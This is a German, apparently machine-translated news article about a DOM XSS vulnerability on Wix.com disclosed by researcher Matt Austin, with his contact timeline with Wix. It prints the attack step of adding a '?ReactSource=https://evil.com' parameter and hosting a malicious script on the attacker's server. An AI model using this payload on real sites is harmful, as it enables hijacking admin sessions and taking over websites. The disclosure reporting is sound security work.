Haben Sie schon von Wix gehört(.)mit?
Wix.com ist eine Cloud-basierte Web-Entwicklungsplattform für Anwender entwickelt, HTML5 Web-Sites und mobilen Websites durch den Einsatz des Unternehmens Online-Drag-and-Drop-Tools zu bauen.
Leider, eine ernsthafte XSS Fehler wurde auf der Plattform derzeit Millionen von Websites und Benutzer entdeckt worden zu gefährden.
Wix(.)com hat einen ernsten Fehler XSS, Forscher sagt
Wie von Sicherheitsforscher berichtet, der Service beherbergt Millionen von Websites mit 87 Millionen registrierte Nutzer. Das Erschreckende daran ist, dass alle Benutzer auf diese XSS-Schwachstelle derzeit anfällig sind. Letzteres kann von Angreifern in einer wurmartigen Weise eingesetzt werden Administratorkonten zu übernehmen,. Sobald dies geschehen ist, die Angreifer erhalten die volle Kontrolle über das kompromittierte Websites.
Die XSS-Schwachstelle wurde von Matt Austin von Kontrast Sicherheit offenbart. Er schrieb:
Wix.com hat eine schwere DOM XSS-Schwachstelle, die ein Angreifer die vollständige Kontrolle über jede Website auf Wix gehostet erlaubt. Einfach durch einen einzelnen Parameter auf jeder Website auf Wix erstellt Hinzufügen, kann der Angreifer ihr JavaScript verursachen im Rahmen der Ziel-Website geladen werden und laufen.
Eine einfache Codezeile ist genug, um den Fehler auszulösen
Der Angriff kann nur auf jede URL von Wix durch Hinzufügen einer einfachen Umleitungsbefehl ausgelöst werden(.)mit. Das Ergebnis wird auf bösartige JavaScrip umgeleitet. Siehe unten ein Beispiel:
- Hinzufügen: ?ReactSource = https://evil.com an jede URL für jede Website erstellt auf wix.com.
- Stellen Sie sicher, evil.com beherbergt eine bösartige Datei auf /packages-bin/wixCodeInit/wixCodeInit.min.js
Diese einfachen Linien von Codes sind genug für die Angreifer sicher sein, dass ihre JS geladen und aktiviert wird als Teil der gezielten Website, Der Forscher erklärt. Die Angreifer sind auch in der Lage den Zugriff auf Admin-Session-Cookies und Ressourcen zu gewinnen, ein sehr schlechtes Szenario tatsächlich. Immer, wenn ein Session-Cookie wird geerntet, Angreifer können die DOM XSS in einem Iframe frei positionieren. Dies geschieht, bösartige Inhalte auf einer Website durch einen Operator verwaltet Gastgeber.
Bei Erfolg, Dieser Angriff kann für die Verbreitung von Malware genutzt werden, Webseite Modifikation, Kryptowährung Bergbau, Ändern Kontodaten, etc.
Was hat Wix sagen?
Wie für die Kommunikation mit wix(.)mit, die Forscher teilt die folgende Erfahrung:
Oktober 10: Erzeugt Support-Ticket-Sicherheit Kontakt Anfordern
Oktober 11: Erreichen Sie auf Twitter zu @wix Sicherheits Kontakt zu finden. Antwortete Standard-Support zu nutzen. Gab Angaben erstellt Ticket. Ticket-Seite funktioniert nicht mehr. https://www.wix.com/support/html5/contact.
Oktober 14: Received Standard "Wir untersuchen die Angelegenheit und wird so schnell wie möglich folgen" Antwort von Wix.
Oktober 20: Beantworten Ticket auf ein Update. (keine Antwort)
Oktober 27: Zweite Anfrage für ein Update. (keine Antwort)
Am Oktober 28, die Forscher schließlich erhielt eine Reaktion, die, dass die angegebenen
Gruppe versucht, Sie zu kontaktieren (Sicherheit) möglicherweise nicht vorhanden, oder Sie können nicht die Erlaubnis Nachrichten schreiben zu können, um die Gruppe.
Dennoch, der CEO von Wix Avishai Abrahami schließlich zugegeben, dass bestimmte Aspekte der Plattform, auf der Wordpress-Open-Source-Bibliothek basieren. Er behauptet, dass alles, was verbessert wurde auf wurde an die Gemeinde freigegeben zurück, ZDNet berichtet.